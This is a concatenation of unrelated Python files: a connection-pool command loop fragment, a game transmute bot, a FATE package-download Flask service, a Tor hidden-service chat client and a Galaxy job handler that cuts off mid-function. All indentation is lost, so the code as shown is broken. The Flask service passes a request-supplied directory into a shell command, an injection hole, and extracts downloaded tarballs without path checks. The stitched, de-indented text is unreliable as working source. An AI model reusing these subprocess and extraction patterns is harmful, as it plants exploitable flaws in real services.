if cmd == "list":
print(CONNECTION_POOL.keys())
if cmd == "exit":
break
if cmd == "list1":
print(CONNECTION_POOL)
|
gem_transmute.py
|
from screen import Screen
from game_stats import GameStats
from template_finder import TemplateFinder
from transmute import Transmute
import threading
import keyboard
from ui.ui_manager import UiManager
if __name__ == "__main__":
s = Screen()
finder = TemplateFinder(s)
stats = GameStats()
ui = UiManager(s, finder, stats)
cuber = Transmute(s, finder, stats, ui)
bot_thread = threading.Thread(target=cuber.run_transmutes, args=[True])
bot_thread.daemon = True
keyboard.add_hotkey("f11", lambda: bot_thread.start())
keyboard.wait("f12")
|
package_app.py
|
#
# Copyright 2020 The FATE Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import shutil
import tarfile
import requests
from subprocess import getoutput
from flask import Flask, request
from settings import stat_logger
from multiprocessing import Process
from utils.api_utils import get_json_result
from utils.base_utils import current_timestamp
from utils.file_utils import get_project_base_directory, get_package_dir_by_version
from utils.job_utils import check_config
from ruamel import yaml
from datetime import datetime
from db.db_models import Package, DB
manager = Flask(__name__)
@manager.errorhandler(500)
def internal_server_error(e):
stat_logger.exception(e)
return get_json_result(retcode=100, retmsg=str(e))
@manager.route('/local', methods=['POST'])
def check_local_package():
request_data = request.json
required_parameters = ['dir']
check_config(request_data, required_parameters)
if os.path.exists(request_data['dir']) and os.path.exists(os.path.join(request_data['dir'], 'roles')):
# get package module version
var_fp = os.path.join(request_data['dir'], 'example', 'var_files', 'exp', 'fate_init')
versions = {}
if os.path.exists(var_fp):
with open(var_fp, 'r') as fin:
versions = yaml.safe_load(fin.read()).get('versions', {})
output = getoutput(f"du -d 1 -h {os.path.join(request_data['dir'], 'roles')}").split('\n')
result = []
for s in output:
items = s.split()
module_name = os.path.basename(items[1])
if module_name != 'roles':
result.append({
'module': module_name,
'size': items[0],
'time': datetime.fromtimestamp(os.path.getctime(items[1])).strftime('%Y%m%d'),
'description': module_name if not versions.get(module_name) else f"{module_name} {versions.get(module_name)}",
'version': versions.get(module_name, None)
})
return get_json_result(data={'version': versions.get('fate_flow'), 'list': result})
return get_json_result(retcode=100, retmsg='package dir not exists.')
@manager.route('/download', methods=['POST'])
def download_package():
request_data = request.json
required_parameters = ['version', 'url']
check_config(request_data, required_parameters)
if not request_data['url']:
raise Exception(f"illegal url {request_data['url']}")
if not request_data['version']:
raise Exception(f"illegal url {request_data['version']}")
os.makedirs(os.path.join(get_project_base_directory(), 'packages'), exist_ok=True)
package_dir = get_package_dir_by_version(request_data.get('version'))
if os.path.exists(package_dir):
return get_json_result(retcode=100,
retmsg=f"Downloading mirror with version {request_data.get('version')} failed, "
f"package dir {package_dir} already exists.")
package_instance = Package.get_or_none(Package.f_version == request_data['version'],
Package.f_status == 'success')
if package_instance:
return get_json_result(retcode=100,
retmsg=f"Downloading mirror with version {request_data.get('version')} failed, "
f"version info has been stored in database.")
request_data['dir'] = package_dir
p = Process(target=do_download, args=(request_data, ))
p.start()
return get_json_result(retmsg=f"Start downloading mirror from url: {request_data.get('url')}.",
data= {'version': request_data.get('version')})
@DB.connection_context()
def do_download(data):
path = os.path.abspath(os.path.join(data.get('dir'), os.pardir, f'temp-{data["version"]}'))
os.makedirs(path, exist_ok=True)
fp = os.path.join(path, "package.tar.gz")
url = data.get('url')
p = Package()
p.f_status = 'running'
p.f_version = data.get('version')
p.f_start_time = current_timestamp()
p.save(force_insert=True)
try:
stat_logger.info('Start downloading process')
with requests.get(url, stream=True) as req:
with open(fp, 'wb') as f:
for chunk in req.iter_content(chunk_size=1024*5):
if chunk:
f.write(chunk)
except Exception as e:
stat_logger.exception(e)
else:
end_time = current_timestamp()
p.f_end_time = end_time
p.f_elapsed = p.f_end_time - p.f_start_time
p.f_status = 'success'
tar = tarfile.open(fp)
try:
dir_name = tar.getmembers()[0].name
tar.extractall(path=path)
stat_logger.info(f"rename: src: {os.path.join(path, dir_name)}")
dst = data.get('dir')
stat_logger.info(f"rename: dst: {dst}")
os.rename(src=os.path.join(path, dir_name), dst=dst)
shutil.rmtree(path=path)
except Exception as e:
stat_logger.exception(e)
p.f_status = 'failed'
finally:
tar.close()
p.save()
DB.commit()
@manager.route('/remote', methods=['POST'])
def query_package():
request_data = request.json
required_paramters = ['version']
check_config(request_data, required_paramters)
p = get_package_download_record(request_data['version'])
if p:
return get_json_result(data=p.to_json())
return get_json_result(retcode=100, retmsg=f"can not found version {request_data['version']} record")
@DB.connection_context()
def get_package_download_record(version: str):
return Package.get_or_none(f_version=version)
|
console_chat.py
|
import json
import threading
import sys
import os
import logging
import time
import pandas as pd
logger = logging.getLogger(__name__)
_dir = os.path.abspath(os.path.dirname(__file__))
_dir = os.path.join(_dir, "../")
_dir = os.path.abspath(_dir)
sys.path.append(_dir)
from allium_messenger.connection import AlliumConnection
def process_message_functor(payload):
decoded = json.loads(payload.decode("utf-8"))
logger.error("--------------------------------------------------------------")
logger.info("test")
print(f"received message from {decoded['address']}:")
print(f" {decoded['message']}")
print("--------------------------------------------------------------")
return
def send_loop(connection):
time.sleep(3)
while True:
message = input("Your message: ")
logger.info(f"{message}, {connection.get_service_name()[0]}")
connection.send_message(message, connection.get_service_name()[0])
def get_contacts_from_file(filename):
contacts = pd.read_csv(filename)
contacts = {row["name"]: row["identifier"] for _,row in contacts.iterrows()}
logger.info(contacts)
return contacts
def main():
contacts_file = os.path.join(os.path.abspath(os.path.dirname(__file__)), "contacts.csv")
contacts = get_contacts_from_file(contacts_file)
identifiers = {contacts[k]: k for k in contacts}
my_connection = AlliumConnection(hidden_svc_dir='hidden_service', process_message_functor=process_message_functor)
try:
service = threading.Thread(target=my_connection.create_service, args=(), daemon=True)
service.start()
except:
logger.error("Error: unable to start thread")
logger.info("ready for input loop")
send_loop(connection=my_connection)
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO)
main()
|
handler.py
|
"""
Galaxy job handler, prepares, runs, tracks, and finishes Galaxy jobs
"""
import os
import time
import logging
import threading
from Queue import Queue, Empty
from sqlalchemy.sql.expression import and_, or_, select, func, true, null
from galaxy import model
from galaxy.util.sleeper import Sleeper
from galaxy.jobs import JobWrapper, TaskWrapper, JobDestination
from galaxy.jobs.mapper import JobNotReadyException
log = logging.getLogger( __name__ )
# States for running a job. These are NOT the same as data states
JOB_WAIT, JOB_ERROR, JOB_INPUT_ERROR, JOB_INPUT_DELETED, JOB_READY, JOB_DELETED, JOB_ADMIN_DELETED, JOB_USER_OVER_QUOTA = 'wait', 'error', 'input_error', 'input_deleted', 'ready', 'deleted', 'admin_deleted', 'user_over_quota'
DEFAULT_JOB_PUT_FAILURE_MESSAGE = 'Unable to run job due to a misconfiguration of the Galaxy job running system. Please contact a site administrator.'
class JobHandler( object ):
"""
Handle the preparation, running, tracking, and finishing of jobs
"""
def __init__( self, app ):
self.app = app
# The dispatcher launches the underlying job runners
self.dispatcher = DefaultJobDispatcher( app )
# Queues for starting and stopping jobs
self.job_queue = JobHandlerQueue( app, self.dispatcher )
self.job_stop_queue = JobHandlerStopQueue( app, self.dispatcher )
def start( self ):
self.job_queue.start()
def shutdown( self ):
self.job_queue.shutdown()
self.job_stop_queue.shutdown()
class JobHandlerQueue( object ):
"""
Job Handler's Internal Queue, this is what actually implements waiting for
jobs to be runnable and dispatching to a JobRunner.
"""
STOP_SIGNAL = object()
def __init__( self, app, dispatcher ):
"""Initializes the Job Handler Queue, creates (unstarted) monitoring thread"""
self.app = app
self.dispatcher = dispatcher
self.sa_session = app.model.context
self.track_jobs_in_database = self.app.config.track_jobs_in_database
# Initialize structures for handling job limits
self.__clear_job_count()
# Keep track of the pid that started the job manager, only it
# has valid threads
self.parent_pid = os.getpid()
# Contains new jobs. Note this is not used if track_jobs_in_database is True
self.queue = Queue()
# Contains jobs that are waiting (only use from monitor thread)
self.waiting_jobs = []
# Contains wrappers of jobs that are limited or ready (so they aren't created unnecessarily/multiple times)
self.job_wrappers = {}
# Helper for interruptable sleep
self.sleeper = Sleeper()
self.running = True
self.monitor_thread = threading.Thread( name="JobHandlerQueue.monitor_thread", target=self.__monitor )
self.monitor_thread.setDaemon( True )
def start( self ):
"""
Starts the JobHandler's thread after checking for any unhandled jobs.
"""
# Recover jobs at startup
self.__check_jobs_at_startup()
# Start the queue
self.monitor_thread.start()
log.info( "job handler queue started" )
def job_wrapper( self, job, use_persisted_destination=False ):
return JobWrapper( job, self, use_persisted_destination=use_persisted_destination )
def job_pair_for_id( self, id ):
job = self.sa_session.query( model.Job ).get( id )
return job, self.job_wrapper( job, use_persisted_destination=True )
def __check_jobs_at_startup( self ):
"""
Checks all jobs that are in the 'new', 'queued' or 'running' state in
the database and requeues or cleans up as necessary. Only run as the
job handler starts.
In case the activation is enforced it will filter out the jobs of inactive users.
"""
jobs_at_startup = []
if self.track_jobs_in_database:
in_list = ( model.Job.states.QUEUED,
model.Job.states.RUNNING )
else:
in_list = ( model.Job.states.NEW,
model.Job.states.QUEUED,
model.Job.states.RUNNING )
if self.app.config.user_activation_on:
jobs_at_startup = self.sa_session.query( model.Job ).enable_eagerloads( False ) \
.outerjoin( model.User ) \
.filter( model.Job.state.in_( in_list ) &
( model.Job.handler == self.app.config.server_name ) &
or_( ( model.Job.user_id == null() ), ( model.User.active == true() ) ) ).all()
else:
jobs_at_startup = self.sa_session.query( model.Job ).enable_eagerloads( False ) \
.filter( model.Job.state.in_( in_list ) &
( model.Job.handler == self.app.config.server_name ) ).all()
for job in jobs_at_startup:
if not self.app.toolbox.has_tool( job.tool_id, job.tool_version, exact=True ):
log.warning( "(%s) Tool '%s' removed from tool config, unable to recover job" % ( job.id, job.tool_id ) )
self.job_wrapper( job ).fail( 'This tool was disabled before the job completed. Please contact your Galaxy administrator.' )
elif job.job_runner_name is not None and job.job_runner_external_id is None:
# This could happen during certain revisions of Galaxy where a runner URL was persisted before the job was dispatched to a runner.
log.debug( "(%s) Job runner assigned but no external ID recorded, adding to the job handler queue" % job.id )
job.job_runner_name = None
if self.track_jobs_in_database:
job.set_state( model.Job.states.NEW )
else:
self.queue.put( ( job.id, job.tool_id ) )
elif job.job_runner_name is not None and job.job_runner_external_id is not None and job.destination_id is None:
# This is the first start after upgrading from URLs to destinations, convert the URL to a destination and persist
job_wrapper = self.job_wrapper( job )
job_destination = self.dispatcher.url_to_destination(job.job_runner_name)
if job_destination.id is None:
job_destination.id = 'legacy_url'
job_wrapper.set_job_destination(job_destination, job.job_runner_external_id)
self.dispatcher.recover( job, job_wrapper )
log.info('(%s) Converted job from a URL to a destination and recovered' % (job.id))
elif job.job_runner_name is None:
# Never (fully) dispatched
log.debug( "(%s) No job runner assigned and job still in '%s' state, adding to the job handler queue" % ( job.id, job.state ) )
if self.track_jobs_in_database:
job.set_state( model.Job.states.NEW )
else:
self.queue.put( ( job.id, job.tool_id ) )
else:
# Already dispatched and running
job_wrapper = self.job_wrapper( job )
# Use the persisted destination as its params may differ from
# what's in the job_conf xml
job_destination = JobDestination(id=job.destination_id, runner=job.job_runner_name, params=job.destination_params)
# resubmits are not persisted (it's a good thing) so they
# should be added back to the in-memory destination on startup
try:
config_job_destination = self.app.job_config.get_destination( job.destination_id )
job_destination.resubmit = config_job_destination.resubmit
except KeyError:
log.warning( '(%s) Recovered destination id (%s) does not exist in job config (but this may be normal in the case of a dynamically generated destination)', job.id, job.destination_id )
job_wrapper.job_runner_mapper.cached_job_destination = job_destination
self.dispatcher.recover( job, job_wrapper )
if self.sa_session.dirty:
self.sa_session.flush()
def __monitor( self ):
"""
Continually iterate the waiting jobs, checking is each is ready to
run and dispatching if so.
"""
while self.running:
try:
# If jobs are locked, there's nothing to monitor and we skip
# to the sleep.
if not self.app.job_manager.job_lock:
self.__monitor_step()
except:
log.exception( "Exception in monitor_step" )
# Sleep
self.sleeper.sleep( 1 )
def __monitor_step( self ):
"""
Called repeatedly by `monitor` to process waiting jobs. Gets any new
jobs (either from the database or from its own queue), then iterates
over all new and waiting jobs to check the state of the jobs each
depends on. If the job has dependencies that have not finished, it
goes to the waiting queue. If the job has dependencies with errors,
it is marked as having errors and removed from the queue. If the job
belongs to an inactive user it is ignored.
Otherwise, the job is dispatched.
"""
# Pull all new jobs from the queue at once
jobs_to_check = []
resubmit_jobs = []
if self.track_jobs_in_database:
# Clear the session so we get fresh states for job and all datasets
self.sa_session.expunge_all()
# Fetch all new jobs
hda_not_ready = self.sa_session.query(model.Job.id).enable_eagerloads(False) \
.join(model.JobToInputDatasetAssociation) \
.join(model.HistoryDatasetAssociation) \
.join(model.Dataset) \
.filter(and_( (model.Job.state == model.Job.states.NEW ),
or_( ( model.HistoryDatasetAssociation._state == model.HistoryDatasetAssociation.states.FAILED_METADATA ),
( model.HistoryDatasetAssociation.deleted == true() ),
( model.Dataset.state != model.Dataset.states.OK ),
( model.Dataset.deleted == true() ) ) ) ).subquery()
ldda_not_ready = self.sa_session.query(model.Job.id).enable_eagerloads(False) \
.join(model.JobToInputLibraryDatasetAssociation) \
.join(model.LibraryDatasetDatasetAssociation) \
.join(model.Dataset) \
.filter(and_((model.Job.state == model.Job.states.NEW),
or_((model.LibraryDatasetDatasetAssociation._state != null()),
(model.LibraryDatasetDatasetAssociation.deleted == true()),
(model.Dataset.state != model.Dataset.states.OK),
(model.Dataset.deleted == true())))).subquery()
if self.app.config.user_activation_on:
jobs_to_check = self.sa_session.query(model.Job).enable_eagerloads(False) \
.outerjoin( model.User ) \
.filter(and_((model.Job.state == model.Job.states.NEW),
or_((model.Job.user_id == null()), (model.User.active == true())),
(model.Job.handler == self.app.config.server_name),
~model.Job.table.c.id.in_(hda_not_ready),
~model.Job.table.c.id.in_(ldda_not_ready))) \
.order_by(model.Job.id).all()
else:
jobs_to_check = self.sa_session.query(model.Job).enable_eagerloads(False) \
.filter(and_((model.Job.state == model.Job.states.NEW),
(model.Job.handler == self.app.config.server_name),
~model.Job.table.c.id.in_(hda_not_ready),
~model.Job.table.c.id.in_(ldda_not_ready))) \
.order_by(model.Job.id).all()
# Fetch all "resubmit" jobs
resubmit_jobs = self.sa_session.query(model.Job).enable_eagerloads(False) \
.filter(and_((model.Job.state == model.Job.states.RESUBMITTED),
(model.Job.handler == self.app.config.server_name))) \
.order_by(model.Job.id).all()
else:
# Get job objects and append to watch queue for any which were
# previously waiting
for job_id in self.waiting_jobs:
jobs_to_check.append( self.sa_session.query( model.Job ).get( job_id ) )
try:
while 1:
message = self.queue.get_nowait()
if message is self.STOP_SIGNAL:
return
# Unpack the message
job_id, tool_id = message
# Get the job object and append to watch queue
jobs_to_check.append( self.sa_session.query( model.Job ).get( job_id ) )
except Empty:
pass
# Ensure that we get new job counts on each iteration
self.__clear_job_count()
# Check resubmit jobs first so that limits of new jobs will still be enforced
for job in resubmit_jobs:
log.debug( '(%s) Job was resubmitted and is being dispatched immediately', job.id )
# Reassemble resubmit job destination from persisted value
jw = self.job_wrapper( job )
jw.job_runner_mapper.cached_job_destination = JobDestination( id=job.destination_id, runner=job.job_runner_name, params=job.destination_params )
self.increase_running_job_count(job.user_id, jw.job_destination.id)
self.dispatcher.put( jw )
# Iterate over new and waiting jobs and look for any that are
# ready to run
new_waiting_jobs = []
for job in jobs_to_check:
try:
# Check the job's dependencies, requeue if they're not done.
# Some of these states will only happen when using the in-memory job queue
job_state = self.__check_job_state( job )
if job_state == JOB_WAIT:
new_waiting_jobs.append( job.id )
elif job_state == JOB_INPUT_ERROR:
log.info( "(%d) Job unable to run: one or more inputs in error state" % job.id )
elif job_state == JOB_INPUT_DELETED:
log.info( "(%d) Job unable to run: one or more inputs deleted" % job.id )
elif job_state == JOB_READY:
self.dispatcher.put( self.job_wrappers.pop( job.id ) )
log.info( "(%d) Job dispatched" % job.id )
elif job_state == JOB_DELETED:
log.info( "(%d) Job deleted by user while still queued" % job.id )
elif job_state == JOB_ADMIN_DELETED:
log.info( "(%d) Job deleted by admin while still queued" % job.id )
elif job_state == JOB_USER_OVER_QUOTA:
log.info( "(%d) User (%s) is over quota: job paused" % ( job.id, job.user_id ) )
job.set_state( model.Job.states.PAUSED )
for dataset_assoc in job.output_datasets + job.output_library_datasets:
dataset_assoc.dataset.dataset.state = model.Dataset.states.PAUSED
dataset_assoc.dataset.info = "Execution of this dataset's job is paused because you were over your disk quota at the time it was ready to run"
self.sa_session.add( dataset_assoc.dataset.dataset )
self.sa_session.add( job )
elif job_state == JOB_ERROR:
log.error( "(%d) Error checking job readiness" % job.id )
else:
log.error( "(%d) Job in unknown state '%s'" % ( job.id, job_state ) )
new_waiting_jobs.append( job.id )
except Exception:
log.exception( "failure running job %d" % job.id )
# Update the waiting list
if not self.track_jobs_in_database:
self.waiting_jobs = new_waiting_jobs
# Remove cached wrappers for any jobs that are no longer being tracked
for id in self.job_wrappers.keys():
if id not in new_waiting_jobs:
del self.job_wrappers[id]
# Flush, if we updated the state
self.sa_session.flush()
# Done with the session
self.sa_session.remove()
def __check_job_state( self, job ):
"""
Check if a job is ready to run by verifying that each of its input
datasets is ready (specifically in the OK state). If any input dataset
has an error, fail the job and return JOB_INPUT_ERROR. If any input
dataset is deleted, fail the job and return JOB_INPUT_DELETED. If all
input datasets are in OK state, return JOB_READY indicating that the
job can be dispatched. Otherwise, return JOB_WAIT indicating that input
datasets are still being prepared.
"""
if not self.track_jobs_in_database:
in_memory_not_ready_state = self.__verify_in_memory_job_inputs( job )
if in_memory_not_ready_state:
return in_memory_not_ready_state
# Else, if tracking in the database, job.state is guaranteed to be NEW and
# the inputs are guaranteed to be OK.
# Create the job wrapper so that the destination can be set
job_id = job.id
job_wrapper = self.job_wrappers.get( job_id, None )
if not job_wrapper:
job_wrapper = self.job_wrapper( job )
self.job_wrappers[ job_id ] = job_wrapper
# If state == JOB_READY, assume job_destination also set - otherwise
# in case of various error or cancelled states do not assume
# destination has been set.
state, job_destination = self.__verify_job_ready( job, job_wrapper )
if state == JOB_READY:
# PASS. increase usage by one job (if caching) so that multiple jobs aren't dispatched on this queue iteration
self.increase_running_job_count(job.user_id, job_destination.id )
return state
def __verify_job_ready( self, job, job_wrapper ):
""" Compute job destination and verify job is ready at that
destination by checking job limits and quota. If this method
return a job state of JOB_READY - it MUST also return a job
destination.
"""
job_destination = None
try:
assert job_wrapper.tool is not None, 'This tool was disabled before the job completed. Please contact your Galaxy administrator.'
# Cause the job_destination to be set and cached by the mapper
job_destination = job_wrapper.job_destination
except AssertionError as e:
log.warning( "(%s) Tool '%s' removed from tool config, unable to run job" % ( job.id, job.tool_id ) )
job_wrapper.fail( e )
return JOB_ERROR, job_destination
except JobNotReadyException as e:
job_state = e.job_state or JOB_WAIT
return job_state, None
except Exception as e:
failure_message = getattr( e, 'failure_message', DEFAULT_JOB_PUT_FAILURE_MESSAGE )
if failure_message == DEFAULT_JOB_PUT_FAILURE_MESSAGE:
log.exception( 'Failed to generate job destination' )
else:
log.debug( "Intentionally failing job with message (%s)" % failure_message )
job_wrapper.fail( failure_message )
return JOB_ERROR, job_destination
# job is ready to run, check limits
# TODO: these checks should be refactored to minimize duplication and made more modular/pluggable
state = self.__check_destination_jobs( job, job_wrapper )
if state == JOB_READY:
state = self.__check_user_jobs( job, job_wrapper )
if state == JOB_READY and self.app.config.enable_quotas:
quota = self.app.quota_agent.get_quota( job.user )
if quota is not None:
try:
usage = self.app.quota_agent.get_usage( user=job.user, history=job.history )
if usage > quota:
return JOB_USER_OVER_QUOTA, job_destination
except AssertionError as e:
pass # No history, should not happen with an anon user
return state, job_destination
def __verify_in_memory_job_inputs( self, job ):
""" Perform the same checks that happen via SQL for in-memory managed
jobs.
"""
if job.state == model.Job.states.DELETED:
return JOB_DELETED
elif job.state == model.Job.states.ERROR:
return JOB_ADMIN_DELETED
for dataset_assoc in job.input_datasets + job.input_library_datasets:
idata = dataset_assoc.dataset
if not idata:
continue
# don't run jobs for which the input dataset was deleted
if idata.deleted:
self.job_wrappers.pop(job.id, self.job_wrapper( job )).fail( "input data %s (file: %s) was deleted before the job started" % ( idata.hid, idata.file_name ) )
return JOB_INPUT_DELETED
# an error in the input data causes us to bail immediately
elif idata.state == idata.states.ERROR:
self.job_wrappers.pop(job.id, self.job_wrapper( job )).fail( "input data %s is in error state" % ( idata.hid ) )
return JOB_INPUT_ERROR
elif idata.state == idata.states.FAILED_METADATA:
self.job_wrappers.pop(job.id, self.job_wrapper( job )).fail( "input data %s failed to properly set metadata" % ( idata.hid ) )
return JOB_INPUT_ERROR
elif idata.state != idata.states.OK and not ( idata.state == idata.states.SETTING_METADATA and job.tool_id is not None and job.tool_id == self.app.datatypes_registry.set_external_metadata_tool.id ):
# need to requeue
return JOB_WAIT
# All inputs ready to go.
return None
def __clear_job_count( self ):
self.user_job_count = None
self.user_job_count_per_destination = None
self.total_job_count_per_destination = None
def get_user_job_count(self, user_id):
self.__cache_user_job_count()
# This could have been incremented by a previous job dispatched on this iteration, even if we're not caching
rval = self.user_job_count.get(user_id, 0)
if not self.app.config.cache_user_job_count:
result = self.sa_session.execute(select([func.count(model.Job.table.c.id)])
.where(and_(model.Job.table.c.state.in_((model.Job.states.QUEUED,
model.Job.states.RUNNING,
model.Job.states.RESUBMITTED)),
(model.Job.table.c.user_id == user_id))))
for row in result:
# there should only be one row
rval += row[0]
return rval
def __cache_user_job_count( self ):
# Cache the job count if necessary
if self.user_job_count is None and self.app.config.cache_user_job_count:
self.user_job_count = {}
query = self.sa_session.execute(select([model.Job.table.c.user_id, func.count(model.Job.table.c.user_id)])
.where(and_(model.Job.table.c.state.in_((model.Job.states.QUEUED,
model.Job.states.RUNNING,
model.Job.states.RESUBMITTED)),
(model.Job.table.c.user_id != null())))
.group_by(model.Job.table.c.user_id))
for row in query:
self.user_job_count[row[0]] = row[1]
elif self.user_job_count is None:
self.user_job_count = {}
def get_user_job_count_per_destination(self, user_id):
self.__cache_user_job_count_per_destination()
cached = self.user_job_count_per_destination.get(user_id, {})
if self.app.config.cache_user_job_count:
rval = cached
else:
# The cached count is still used even when we're not caching, it is
# incremented when a job is run by this handler to ensure that
# multiple jobs can't get past the limits in one iteration of the
# queue.
rval = {}
rval.update(cached)
result = self.sa_session.execute(select([model.Job.table.c.destination_id, func.count(model.Job.table.c.destination_id).label('job_count')])
.where(and_(model.Job.table.c.state.in_((model.Job.states.QUEUED, model.Job.states.RUNNING)), (model.Job.table.c.user_id == user_id)))
.group_by(model.Job.table.c.destination_id))
for row in result:
# Add the count from the database to the cached count
rval[row['destination_id']] = rval.get(row['destination_id'], 0) + row['job_count']
return rval
def __cache_user_job_count_per_destination(self):
# Cache the job count if necessary
if self.user_job_count_per_destination is None and self.app.config.cache_user_job_count:
self.user_job_count_per_destination = {}
result = self.sa_session.execute(select([model.Job.table.c.user_id, model.Job.table.c.destination_id, func.count(model.Job.table.c.user_id).label('job_count')])
.where(and_(model.Job.table.c.state.in_((model.Job.states.QUEUED, model.Job.states.RUNNING))))
.group_by(model.Job.table.c.user_id, model.Job.table.c.destination_id))
for row in result:
if row['user_id'] not in self.user_job_count_per_destination:
self.user_job_count_per_destination[row['user_id']] = {}
self.user_job_count_per_destination[row['user_id']][row['destination_id']] = row['job_count']
elif self.user_job_count_per_destination is None:
self.user_job_count_per_destination = {}
def increase_running_job_count(self, user_id, destination_id):
if self.app.job_config.limits.registered_user_concurrent_jobs or \
self.app.job_config.limits.anonymous_user_concurrent_jobs or \
self.app.job_config.limits.destination_user_concurrent_jobs:
if self.user_job_count is None:
self.user_job_count = {}
if self.user_job_count_per_destination is None:
self.user_job_count_per_destination = {}
self.user_job_count[user_id] = self.user_job_count.get(user_id, 0) + 1
if user_id not in self.user_job_count_per_destination:
self.user_job_count_per_destination[user_id] = {}
self.user_job_count_per_destination[user_id][destination_id] = self.user_job_count_per_destination[user_id].get(destination_id, 0) + 1
if self.app.job_config.limits.destination_total_concurrent_jobs:
if self.total_job_count_per_destination is None:
self.total_job_count_per_destination = {}
self.total_job_count_per_destination[destination_id] = self.total_job_count_per_destination.get(destination_id, 0) + 1
def __check_user_jobs( self, job, job_wrapper ):
# TODO: Update output datasets' _state = LIMITED or some such new
# state, so the UI can reflect what jobs are waiting due to concurrency
# limits
if job.user:
# Check the hard limit first
if self.app.job_config.limits.registered_user_concurrent_jobs:
count = self.get_user_job_count(job.user_id)
# Check the user's number of dispatched jobs against the overall limit
if count >= self.app.job_config.limits.registered_user_concurrent_jobs:
return JOB_WAIT
# If we pass the hard limit, also check the per-destination count
id = job_wrapper.job_destination.id
count_per_id = self.get_user_job_count_per_destination(job.user_id)
if id in self.app.job_config.limits.destination_user_concurrent_jobs:
count = count_per_id.get(id, 0)
# Check the user's number of dispatched jobs in the assigned destination id against the limit for that id
if count >= self.app.job_config.limits.destination_user_concurrent_jobs[id]:
return JOB_WAIT
# If we pass the destination limit (if there is one), also check limits on any tags (if any)
if job_wrapper.job_destination.tags:
for tag in job_wrapper.job_destination.tags:
# Check each tag for this job's destination
if tag in self.app.job_config.limits.destination_user_concurrent_jobs:
# Only if there's a limit defined for this tag
count = 0
for id in [ d.id for d in self.app.job_config.get_destinations(tag) ]:
# Add up the aggregate job total for this tag
count += count_per_id.get(id, 0)
if count >= self.app.job_config.limits.destination_user_concurrent_jobs[tag]:
return JOB_WAIT
elif job.galaxy_session:
# Anonymous users only get the hard limit
if self.app.job_config.limits.anonymous_user_concurrent_jobs:
count = self.sa_session.query( model.Job ).enable_eagerloads( False ) \
.filter( and_( model.Job.session_id == job.galaxy_session.id,
or_( model.Job.state == model.Job.states.RUNNING,
model.Job.state == model.Job.states.QUEUED ) ) ).count()
if count >= self.app.job_config.limits.anonymous_user_concurrent_jobs:
return JOB_WAIT
else:
log.warning( 'Job %s is not associated with a user or session so job concurrency limit cannot be checked.' % job.id )
return JOB_READY
def __cache_total_job_count_per_destination( self ):
# Cache the job count if necessary
if self.total_job_count_per_destination is None:
self.total_job_count_per_destination = {}
result = self.sa_session.execute(select([model.Job.table.c.destination_id, func.count(model.Job.table.c.destination_id).label('job_count')])
.where(and_(model.Job.table.c.state.in_((model.Job.states.QUEUED, model.Job.states.RUNNING))))
.group_by(model.Job.table.c.destination_id))
for row in result:
self.total_job_count_per_destination[row['destination_id']] = row['job_count']
def get_total_job_count_per_destination(self):
self.__cache_total_job_count_per_destination()
# Always use caching (at worst a job will have to wait one iteration,
# and this would be more fair anyway as it ensures FIFO scheduling,
# insofar as FIFO would be fair...)
return self.total_job_count_per_destination
def __check_destination_jobs( self, job, job_wrapper ):
if self.app.job_config.limits.destination_total_concurrent_jobs:
id = job_wrapper.job_destination.id
count_per_id = self.get_total_job_count_per_destination()
if id in self.app.job_config.limits.destination_total_concurrent_jobs:
count = count_per_id.get(id, 0)
# Check the number of dispatched jobs in the assigned destination id against the limit for that id
if count >= self.app.job_config.limits.destination_total_concurrent_jobs[id]:
return JOB_WAIT
# If we pass the destination limit (if there is one), also check limits on any tags (if any)
if job_wrapper.job_destination.tags:
for tag in job_wrapper.job_destination.tags:
# Check each tag for this job's destination
if tag in self.app.job_config.limits.destination_total_concurrent_jobs:
# Only if there's a limit defined for this tag
count = 0
for id in [ d.id for d in self.app.job_config.get_destinations(tag) ]:
# Add up the aggregate job total for this tag
count += count_per_id.get(id, 0)
if count >= self.app.job_config.limits.destination_total_concurrent_jobs[tag]:
return JOB_WAIT
return JOB_READY
def put( self, job_id, tool_id ):
"""Add a job to the queue (by job identifier)"""
if not self.track_jobs_in_database:
self.queue.put( ( job_id, tool_id ) )
self.sleeper.wake()
def shutdown( self ):
"""Attempts to gracefully shut down the worker thread"""
if self.parent_pid != os.getpid():
# We're not the real job queue, do nothing
return
else:
log.info( "sending stop signal to worker thread" )
self.running = False
if not self.app.config.track_jobs_in_database:
self.queue.put( self.STOP_SIGNAL )
self.sleeper.wake()
log.info( "job handler queue stopped" )
self.dispatcher.shutdown()
class JobHandlerStopQueue( object ):
"""
A queue for jobs which need to be terminated prematurely.
"""
STOP_SIGNAL = object()
def __init__( self, app, dispatcher ):
self.app = app
self.dispatcher = dispatcher
self.sa_session = app.model.context
# Keep track of the pid that started the job manager, only it
# has valid threads
self.parent_pid = os.getpid()
# Contains new jobs. Note this is not used if track_jobs_in_database is True
self.queue = Queue()
# Contains jobs that are waiting (only use from monitor thread)
self.waiting = []
# Helper for interruptable sleep
self.sleeper = Sleeper()
self.running = True
self.monitor_thread = threading.Thread( name="JobHandlerStopQueue.monitor_thread", target=self.monitor )
self.monitor_thread.setDaemon( True )
self.monitor_thread.start()
log.info( "job handler stop queue started" )
def monitor( self ):
"""
Continually iterate the waiting jobs, stop any that are found.
"""
# HACK: Delay until after forking, we need a way to do post fork notification!!!
time.sleep( 10 )
while self.running:
try:
self.monitor_step()
except:
log.exception( "Exception in monitor_step" )
# Sleep
self.sleeper.sleep( 1 )
def monitor_step( self ):
"""
Called repeatedly by `monitor` to stop jobs.
"""
# Pull all new jobs from the queue at once
jobs_to_check = []
if self.app.config.track_jobs_in_database:
# Clear the session so we get fresh states for job and all datasets
self.sa_session.expunge_all()
# Fetch all new jobs
newly_deleted_jobs = self.sa_session.query( model.Job ).enable_eagerloads( False ) \
.filter( ( model.Job.state == model.Job.states.DELETED_NEW ) &
( model.Job.handler == self.app.config.server_name ) ).all()
for job in newly_deleted_jobs:
jobs_to_check.append( ( job, job.stderr ) )
# Also pull from the queue (in the case of Administrative stopped jobs)
try:
while 1:
message = self.queue.get_nowait()
if message is self.STOP_SIGNAL:
return
# Unpack the message
job_id, error_msg = message
